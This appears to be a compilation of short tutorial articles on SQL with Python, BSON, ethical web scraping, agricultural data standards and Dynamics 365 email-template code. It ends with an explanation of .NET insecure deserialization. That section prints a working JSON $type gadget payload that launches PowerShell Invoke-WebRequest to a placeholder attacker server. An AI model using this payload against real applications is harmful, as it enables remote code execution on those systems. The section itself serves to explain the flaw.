SQL, or Structured Query Language, is the standard language used to interact with relational databases. SQL allows users to read, manipulate, and modify data efficiently.

Some common SQL commands include CREATE, which creates a new table in a database; DROP TABLE, which removes a table; SELECT, which retrieves data that matches specific conditions and is also known as a query; and FROM, which specifies the table from which the data should be retrieved.

Using SQL with Python

In Python, libraries such as SQLAlchemy make it easy to work with databases. SQLAlchemy allows you to connect to a database, execute SQL queries, load the results into a pandas DataFrame, and store processed data back into the database.

This creates a powerful workflow that combines the speed and reliability of SQL with the simplicity and flexibility of pandas.

Important things to remember

It is possible to work directly with databases using tools like sqlite3 without SQLAlchemy. SQLAlchemy also supports many database systems beyond SQLite, including PostgreSQL.

Finally, data wrangling does not always have to be done in pandas. In many professional environments, data cleaning and transformation are performed directly in SQL. The best tool often depends on company infrastructure, performance needs, and scalability requirements.

Understanding databases and SQL is a fundamental skill for anyone working with data. Even if pandas is your primary tool, knowing how databases work and how to query them effectively will make you a stronger and more versatile data professional.

BSON: The Binary Format Behind MongoDB

BSON (Binary JSON) is a binary serialization format designed to represent JSON-like data structures in a more efficient, extensible, and performance-oriented way. It is best known as the native data format used by MongoDB, one of the most popular NoSQL databases in the world.

What Is BSON?

BSON was created as an evolution of JSON. While JSON is simple, human-readable, and widely used in web applications, it has limitations when used for high-performance data storage and processing. BSON addresses these limitations by encoding JSON-like documents into a binary representation, while preserving a familiar structure.

In short, BSON is optimized for machine efficiency rather than human readability.

Key Features

BSON offers several important features:

  • Binary format: enables faster data parsing and traversal.

  • Extended data types: supports additional types such as Date, Binary, ObjectId, Decimal128, and embedded documents.

  • Self-describing structure: each element includes type and length information, making parsing efficient.

  • Support for complex data models: ideal for hierarchical and semi-structured data.

BSON and MongoDB

MongoDB uses BSON as its internal data storage format. This design allows the database to:

  • efficiently index document fields;

  • execute fast queries on nested and complex data;

  • handle large volumes of unstructured or semi-structured data.

When developers interact with MongoDB using JSON through APIs or drivers, the conversion to BSON happens automatically behind the scenes.

 JSON vs BSON



Text-basedBinary
Human-readableNot human-readable
Limited data typesRich data types
Smaller in some casesFaster to process

Although BSON documents can be larger in size than JSON equivalents, this trade-off is justified by improved performance and greater flexibility.

Advantages and Disadvantages

Advantages

  • High performance

  • Rich data typing

  • Well-suited for NoSQL databases

Disadvantages

  • Not directly readable by humans

  • More complex than JSON

  • Requires specific libraries to parse


BSON is a powerful and efficient data representation format designed for modern database systems. While it is rarely used directly by developers, it plays a critical role in enabling MongoDB’s performance, scalability, and flexibility. Understanding BSON provides valuable insight into how NoSQL databases manage and process data internally.


Web Scraping: What It Is, When to Use It, and Why to Do It Ethically

In the world of data, one of the most common challenges is accessing information. Very often, the data we need is not available in downloadable formats (such as CSV or Excel), but is instead embedded within web pages. This is where web scraping comes into play.

What Is Web Scraping?

Web scraping is a technique that allows you to extract data from websites using code. Web pages are written in HTML (HyperText Markup Language), a language that uses tags to structure content (headings, paragraphs, tables, links, etc.).

Since HTML is essentially text, it can be read and analyzed by programs called parsers, which make it possible to automatically locate and retrieve the desired information.

In practice, instead of manually copying and pasting data from a website, we can write a script that does it for us.

How Do You Obtain HTML Data?

HTML data can be collected in two main ways:

  • By manually downloading the HTML source code of a web page

  • By programmatically accessing the website via HTTP requests (for example, using a GET request)

Once the HTML is obtained, it can be analyzed and transformed into structured data ready for analysis.

When Not to Use Web Scraping

It’s important to clarify a crucial point: web scraping is not always allowed.

Many websites impose specific restrictions in their Terms and Conditions, and ignoring them can lead to legal issues. For this reason, it’s essential to do your homework before starting any scraping activity.

Here are some fundamental guidelines to follow:

  • Always check the website’s Terms and Conditions

  • Consider whether your data usage is personal, academic, or commercial

  • Act ethically and responsibly

  • If the website offers a public API, use it instead of scraping

  • Send HTTP requests at a reasonable frequency

  • Avoid massive or simultaneous requests that could resemble a DDoS attack

  • Stay informed about laws and regulations related to web scraping

Web scraping is not just a technical matter, but also an ethical one. There are excellent articles that explore this topic further, such as “Ethics in Web Scraping” on Towards Data Science.

API vs Web Scraping

Whenever possible, it’s always better to choose APIs over scraping.

Why?

  • APIs are more stable: they don’t depend on a website’s layout

  • They are specifically designed to provide data

  • They offer data that is already structured and easy to use

  • They scale better with increased request volume

Web scraping, on the other hand, is fragile: even a small change in the website’s HTML code (a redesign, a new tag, a different class) can completely break your script.

Golden rule: if an official API exists, use it.

Key Terms to Know

For beginners, here are some essential concepts:

  • HTML (HyperText Markup Language): the markup language used to create web pages

  • Parser: a tool that analyzes HTML code to extract information

  • Web Scraping: a technique for extracting data from websites using code


Web scraping is a powerful and highly useful tool for anyone working with data, but it must be used consciously and responsibly. Understanding how HTML works, when to use scraping, and when to avoid it is essential to becoming an effective—and above all ethical—data wrangler.

If you want to work with web data, remember: respect websites, respect the rules, and always choose the best solution between scraping and APIs.

How the Agricultural Sector Can Finally Tackle Its Data Problem


Agriculture is at a critical crossroads. With food security, climate change and farmer incomes all under pressure, digital innovation could be a game-changer. But there’s a big catch: agricultural data — while incredibly valuable — remains fragmented, inconsistent and hard to use. (World Economic Forum)

Why Data Matters More Than Ever

Emerging technologies like artificial intelligence, machine learning, drones and sensors have huge potential to transform agriculture — from better crop predictions to smarter resource use. But these technologies depend on data. Not just any data, but accurate, standardized and easily shareable data that AI and digital platforms can actually work with. (World Economic Forum)

The Big Challenges

The agricultural sector faces three core data issues:

1. Fragmentation
Data comes from many different sources — soil measurements, weather reports, satellite imagery, market prices and more — but it’s scattered across systems that don’t talk to each other. (World Economic Forum)

2. Lack of Standard Formats
There’s no common language or format for agricultural data. Different organizations collect data differently, which makes combining and analyzing it difficult. (World Economic Forum)

3. Poor Interchange Between Systems
Agriculture evolves quickly — crops grow, weather changes, pests spread. To respond in real time, farmers and platforms need dynamic data that can be shared instantly. Right now that’s not happening efficiently. (World Economic Forum)

A Path Forward: Common Data Standards

To unlock the full potential of digital agriculture, the sector needs a shared, open data format that can be used across tools and platforms. Standardizing data would help:

  • Build predictive models that give farmers tailored advice

  • Improve market access and supply chain planning

  • Enable new digital services and apps that boost productivity and efficiency (World Economic Forum)

Some existing efforts — like the United Nations’ AGROVOC agricultural vocabulary — are already useful, but what’s needed now is an industry-wide, interoperable data system. Using common tech standards (like JSON and GeoJSON) as building blocks can help create formats that work for both humans and machines. (World Economic Forum)

Why It Matters

A unified agricultural data system isn’t just a tech project — it’s a way to improve food security, increase farmer incomes, and fuel innovation across the entire value chain. When data flows freely (with proper safeguards and consent), everyone from smallholder farmers to global agribusinesses can benefit. (World Economic Forum).

Dynamic Email Placeholder Replacement – PreCreate Plugin Example

In Microsoft Dynamics 365 / Dataverse, email templates are often
static and difficult to adapt to different business scenarios.
A common requirement is to dynamically inject data such as:

Recipient names

Related record information

Conditional fields (shown only when data exists)

This article presents a PreCreate Email plugin that replaces
placeholders inside the email body before the Email record is created,
using clean and reusable logic.



Plugin Overview

Execution details

Entity: email

Message: Create

Stage: Pre-Operation (20)

Purpose: Replace placeholders in email.description

Supported placeholders

PlaceholderSource
##ToRecipient##Names of recipients (To field)
##account.custom_taxcode##Account custom field
##opportunity.custom_recordurl##Opportunity record URL


Complete Plugin Code (Generic & Safe for Sharing)

using Microsoft.Xrm.Sdk;
using Microsoft.Xrm.Sdk.Query;
using System;
using System.Text.RegularExpressions;

namespace Plugins.Email
{
public class PreCreateEmailReplacePlaceholders : IPlugin
{
public void Execute(IServiceProvider serviceProvider)
{
var tracing = (ITracingService)serviceProvider.GetService(typeof(ITracingService));
var context = (IPluginExecutionContext)serviceProvider.GetService(typeof(IPluginExecutionContext));
var factory = (IOrganizationServiceFactory)serviceProvider.GetService(typeof(IOrganizationServiceFactory));

var serviceUser = factory.CreateOrganizationService(context.InitiatingUserId);
var serviceAdmin = factory.CreateOrganizationService(null);

if (context.Stage != 20 ||
context.MessageName != "Create" ||
context.PrimaryEntityName != "email")
{
throw new InvalidPluginExecutionException("Plugin not registered correctly.");
}

if (context.InputParameters.Contains("Target") &&
context.InputParameters["Target"] is Entity target)
{
ExecuteLogic(serviceAdmin, serviceUser, target, tracing);
}
}

private void ExecuteLogic(
IOrganizationService serviceAdmin,
IOrganizationService serviceUser,
Entity target,
ITracingService tracing)
{
tracing?.Trace("START PreCreateEmailReplacePlaceholders");

try
{
if (!target.Contains("description"))
return;

var description = target.GetAttributeValue<string>("description");

#region TO RECIPIENTS

if (target.Contains("to"))
{
var parties = target.GetAttributeValue<EntityCollection>("to")?.Entities;
var recipientNames = string.Empty;

foreach (var party in parties)
{
if (!party.Contains("partyid")) continue;

var reference = party.GetAttributeValue<EntityReference>("partyid");
if (reference == null) continue;

string primaryName;

switch (reference.LogicalName)
{
case "account": primaryName = "name"; break;
case "contact": primaryName = "fullname"; break;
case "systemuser": primaryName = "fullname"; break;
case "queue": primaryName = "name"; break;
default: continue;
}

var entity = serviceAdmin.Retrieve(
reference.LogicalName,
reference.Id,
new ColumnSet(primaryName));

var name = entity.GetAttributeValue<string>(primaryName);

recipientNames = string.IsNullOrEmpty(recipientNames)
? name
: $"{recipientNames}, {name}";
}

description = description.Replace("##ToRecipient##", recipientNames);
}

#endregion

#region REGARDING RECORD

if (target.Contains("regardingobjectid"))
{
var regarding = target.GetAttributeValue<EntityReference>("regardingobjectid");

if (regarding != null)
{
switch (regarding.LogicalName)
{
case "opportunity":
var opportunity = serviceAdmin.Retrieve(
"opportunity",
regarding.Id,
new ColumnSet("custom_recordurl"));

description = description.Replace(
"##opportunity.custom_recordurl##",
opportunity.GetAttributeValue<string>("custom_recordurl"));
break;

case "account":
var account = serviceAdmin.Retrieve(
"account",
regarding.Id,
new ColumnSet("custom_taxcode"));

var pattern = @"<li\s*>\s*Tax Code:\s*##account\.custom_taxcode##\s*</li>";
var taxCode = account.GetAttributeValue<string>("custom_taxcode");

var replacement = !string.IsNullOrWhiteSpace(taxCode)
? $"<li>Tax Code: {taxCode}</li>"
: string.Empty;

description = Regex.Replace(
description,
pattern,
replacement,
RegexOptions.IgnoreCase | RegexOptions.Singleline);
break;
}
}
}

#endregion

target["description"] = description;
}
catch (Exception ex)
{
tracing?.Trace(ex.ToString());
throw new InvalidPluginExecutionException(ex.Message, ex);
}
finally
{
tracing?.Trace("END PreCreateEmailReplacePlaceholders");
}
}
}
}



Example Email Template (HTML)

<p>Dear <strong>##ToRecipient##</strong>,</p>

<p>
A new request has been created in the system.
</p>

<ul>
<li>Tax Code: ##account.custom_taxcode##</li>
</ul>

<p>
You can open the related opportunity here:
</p>

<p>
<a href="##opportunity.custom_recordurl##">Open Opportunity</a>
</p>

<p>
Kind regards,<br/>
CRM Team
</p>



How It Works

1. Recipient Resolution

Reads all records in the To field (activityparty)

Supports users, contacts, accounts, and queues

Joins names into a single string

Replaces ##ToRecipient##



2. Conditional HTML Replacement

For Account-related emails:

If the tax code exists → <li> is rendered

If empty → <li> is completely removed via Regex

This keeps the email HTML clean and professional.



3. Why Pre-Operation?

Executing in PreCreate ensures:

Email body is already finalized when saved

No async jobs

No client-side JavaScript

Works with templates, workflows, Power Automate

Sending Emails from Templates in Dynamics 365: A Real-World Client-Side Pattern

Sending emails from Microsoft Dynamics 365 / Dataverse using Email Templates is a very common requirement.

However, real-world scenarios are rarely simple:

  • Multiple TO and CC recipients

  • Mix of internal users and external email addresses

  • Recipients driven by configuration, not hardcoded values

  • The need to review the email before sending

This article presents a production-proven, client-side pattern to create an Email activity from a template, keeping the implementation practical, explicit, and readable.

The code shown below is based on real production logic. Names, entities, and addresses have been anonymized, but the structure and flow are intentionally unchanged.

Why Client-Side?

This approach is ideal when:

  • The action is triggered by a command bar button or form event

  • The user must see and optionally edit the email before sending

  • Email recipients depend on current form data

For fully automated emails, a server-side solution (plugin or Power Automate) may be more appropriate.

High-Level Flow

  1. Validate form state (no unsaved changes)

  2. Check mandatory business conditions

  3. Retrieve the Email Template by name

  4. Instantiate the template against the current record

  5. Load TO / CC addresses from configuration

  6. Resolve recipients to system users when possible

  7. Build Activity Parties (FROM / TO / CC)

  8. Create the Email activity

  9. Open the Email form for review

Recipient Resolution Strategy

One of the most important parts of the pattern is how recipients are handled.

For each configured email address:

  • If a matching systemuser.internalemailaddress exists → bind the user

  • Otherwise → use addressused

This guarantees that:

  • Internal users appear correctly in Dynamics

  • External recipients are still supported

  • The same logic works across environments

The pattern also supports:

  • Multiple TO recipients

  • Multiple CC recipients

  • Automatic inclusion of the current user

  • Optional inclusion of an administrator or supervisor

Activity Party Masks Recap



Sender (FROM)1
Recipient (TO)2
CC3
BCC4


Correct usage of these values is essential when creating Email activities programmatically.


Configuration-Driven Design

Instead of hardcoding email addresses, this pattern reads them from a configuration table.

Benefits:

  • No deployments required for recipient changes

  • Easy maintenance by administrators

  • Safer promotion across DEV / TEST / PROD

Each configuration record simply contains a semicolon-separated list of email addresses.

Error Handling and User Experience

The implementation intentionally:

  • Stops execution early when prerequisites are not met

  • Provides clear feedback to the user

  • Avoids partially created Email records

This makes the behavior predictable and user-friendly.

This pattern is not about writing the shortest possible JavaScript.
It is about writing explicit, maintainable, and production-ready code that:

  • Mirrors real business requirements

  • Is easy to debug

  • Can be reused across multiple entities and scenarios

If you work frequently with Dynamics 365 Email Templates, this approach provides a solid and battle-tested foundation. 


GenericDocumentCheck: async function (formContext) {


    // =====================

    // 1. Guard clauses

    // =====================

    if (formContext.data.entity.getIsDirty()) {

        Xrm.Navigation.openAlertDialog({ text: "Please save the record before proceeding." });

        return;

    }


    formContext.ui.clearFormNotification("MissingMandatoryField");


    var mandatoryValue = formContext.getAttribute("custom_mandatoryfield")?.getValue();

    if ((!mandatoryValue || mandatoryValue === "") && formContext.ui.getFormType() !== 1) {

        formContext.ui.setFormNotification(

            "Mandatory field is missing.",

            "ERROR",

            "MissingMandatoryField"

        );

        return;

    }


    // =====================

    // 2. Template retrieval

    // =====================

    var recordId = formContext.data.entity.getId().replace(/[{}]/g, "");

    var emailTemplateName = "Generic Request Template";


    var templateFetch = "?fetchXml=" + encodeURIComponent(`

        <fetch top="1">

            <entity name="template">

                <attribute name="templateid" />

                <filter>

                    <condition attribute="title" operator="eq" value="${emailTemplateName}" />

                </filter>

            </entity>

        </fetch>

    `);


    var templateResult = await Xrm.WebApi.retrieveMultipleRecords("template", templateFetch);

    if (!templateResult.entities.length) {

        throw new Error("Email template not found: " + emailTemplateName);

    }


    var templateId = templateResult.entities[0].templateid;


    // =====================

    // 3. Instantiate template

    // =====================

    var instantiateRequest = {

        TemplateId: { guid: templateId },

        ObjectType: "account",

        ObjectId: { guid: recordId },

        getMetadata: function () {

            return {

                boundParameter: null,

                parameterTypes: {

                    TemplateId: { typeName: "Edm.Guid", structuralProperty: 1 },

                    ObjectType: { typeName: "Edm.String", structuralProperty: 1 },

                    ObjectId: { typeName: "Edm.Guid", structuralProperty: 1 }

                },

                operationType: 0,

                operationName: "InstantiateTemplate"

            };

        }

    };


    var response = await Xrm.WebApi.execute(instantiateRequest);

    if (!response.ok) {

        throw new Error("Error during InstantiateTemplate execution.");

    }


    var responseBody = await response.json();

    var emailSubject = responseBody.value[0].subject;

    var emailDescription = responseBody.value[0].description;


    // =====================

    // 4. Read email addresses from configuration

    // =====================

    var getAddressesByConfigName = async (name) => {

        var fetchXml = `<fetch>

            <entity name="email_configuration">

                <attribute name="value" />

                <filter>

                    <condition attribute="name" operator="eq" value="${name}" />

                </filter>

            </entity>

        </fetch>`;


        var result = await Xrm.WebApi.retrieveMultipleRecords(

            "email_configuration",

            "?fetchXml=" + encodeURIComponent(fetchXml)

        );


        if (result?.entities?.length > 0) {

            return result.entities[0].value.split(';');

        } else {

            throw new Error("Email configuration not found: " + name);

        }

    };


    var toAddresses = await getAddressesByConfigName("EMAIL_TO");

    var ccAddresses = await getAddressesByConfigName("EMAIL_CC");


    // =====================

    // 5. Build activity parties

    // =====================

    var activityParties = [];


    // ---------- FROM (Sender) ----------

    var fetchFromUser = "?fetchXml=" + encodeURIComponent(`

        <fetch top="1">

            <entity name="systemuser">

                <attribute name="systemuserid" />

                <filter>

                    <condition attribute="internalemailaddress" operator="eq"

                        value="noreply@company.com" />

                </filter>

            </entity>

        </fetch>

    `);


    var fromResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchFromUser);

    var senderUserId = fromResult.entities.length

        ? fromResult.entities[0].systemuserid

        : null;


    activityParties.push({

        participationtypemask: 1,

        "partyid_systemuser@odata.bind": `/systemusers(${senderUserId})`

    });


    // ---------- TO (Recipients) ----------

    for (var i = 0; i < toAddresses.length; i++) {

        var address = toAddresses[i];


        var fetchToUser = "?fetchXml=" + encodeURIComponent(`

            <fetch top="1">

                <entity name="systemuser">

                    <attribute name="systemuserid" />

                    <filter>

                        <condition attribute="internalemailaddress" operator="eq"

                            value="${address}" />

                    </filter>

                </entity>

            </fetch>

        `);


        var toResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchToUser);

        var partyTo = { participationtypemask: 2 };


        if (toResult.entities.length) {

            partyTo["partyid_systemuser@odata.bind"] =

                `/systemusers(${toResult.entities[0].systemuserid})`;

        } else {

            partyTo["addressused"] = address;

        }


        activityParties.push(partyTo);

    }


    // ---------- CC (Recipients) ----------

    for (var j = 0; j < ccAddresses.length; j++) {

        var address = ccAddresses[j];


        var fetchCcUser = "?fetchXml=" + encodeURIComponent(`

            <fetch top="1">

                <entity name="systemuser">

                    <attribute name="systemuserid" />

                    <filter>

                        <condition attribute="internalemailaddress" operator="eq"

                            value="${address}" />

                    </filter>

                </entity>

            </fetch>

        `);


        var ccResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchCcUser);

        var partyCc = { participationtypemask: 3 };


        if (ccResult.entities.length) {

            partyCc["partyid_systemuser@odata.bind"] =

                `/systemusers(${ccResult.entities[0].systemuserid})`;

        } else {

            partyCc["addressused"] = address;

        }


        activityParties.push(partyCc);

    }


    // ---------- Current user in CC ----------

    var globalContext = Xrm.Utility.getGlobalContext();

    var currentUserId = globalContext.userSettings.userId.replace(/[{}]/g, "");


    activityParties.push({

        participationtypemask: 3,

        "partyid_systemuser@odata.bind": `/systemusers(${currentUserId})`

    });


    // ---------- Optional admin user ----------

    var adminUserId = CustomUtility.getAdminUserId?.();

    if (adminUserId) {

        activityParties.push({

            participationtypemask: 3,

            "partyid_systemuser@odata.bind": `/systemusers(${adminUserId})`

        });

    }


    // =====================

    // 6. Create email

    // =====================

    var email = {

        subject: emailSubject,

        description: emailDescription,

        "regardingobjectid_account@odata.bind": `/accounts(${recordId})`,

        email_activity_parties: activityParties

    };


    Xrm.WebApi.createRecord("email", email).then(

        function success(result) {

            Xrm.Navigation.openForm({

                entityName: "email",

                entityId: result.id

            });

        },

        function error(e) {

            console.error(e.message);

        }

    );

}


NET insecure deserialization vulnerability

This attack is an example of a .NET insecure deserialization vulnerability that results in remote command execution using PowerShell. It occurs when an application deserializes untrusted JSON input and allows attackers to control which .NET objects are created during the process.

The attack begins when a vulnerable .NET application processes JSON data that includes type metadata such as the $type field. If the application does not restrict allowed types, the attacker can force the runtime to instantiate arbitrary .NET classes instead of simple data objects.

In this case, the attacker abuses the System.Windows.Data.ObjectDataProvider class. This class is commonly used in WPF applications for data binding, but it becomes dangerous during deserialization because it can automatically invoke methods as part of object initialization.

Through the crafted JSON payload, the attacker instructs the application to create an instance of System.Diagnostics.Process. This class is designed to start system processes and is not meant to be exposed to untrusted input. The payload specifies the method name Start, which causes the process to be executed automatically during deserialization.

When the Start method is invoked, the application launches PowerShell, a powerful command-line tool that is installed by default on Windows systems. Attackers frequently use PowerShell because it is trusted by the operating system and often allowed through security controls.

The PowerShell command includes Invoke-WebRequest, which sends an HTTP request to an attacker-controlled server. This outbound connection is typically used to confirm that the target system has been compromised, download additional malicious payloads, or retrieve further commands from a command-and-control server.

At this point, the attacker has achieved code execution with the same privileges as the vulnerable application. From here, they can escalate the attack by downloading malware, exfiltrating sensitive data, establishing persistence, or moving laterally across the network.

This attack works because the application treats deserialization as a safe data operation, while in reality it allows object creation and method execution. Without strict controls, deserialization becomes equivalent to executing attacker-supplied code.

The key lesson is that deserialization in .NET is not just about parsing data. If untrusted input is accepted and dangerous types are not restricted, it can directly lead to full system compromise. This makes insecure deserialization a critical security issue and a recurring entry in real-world attacks and vulnerability reports.


{
 "$type": "System.Windows.Data.ObjectDataProvider,
PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0,
Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": [
      "Cmd",
      "/c powershell -command \"Invoke-WebRequest -URI
http://attacker-server.com\""
    ]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0,
Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}


powershell -command \"Invoke-WebRequest -URI http://attacker-server.com\"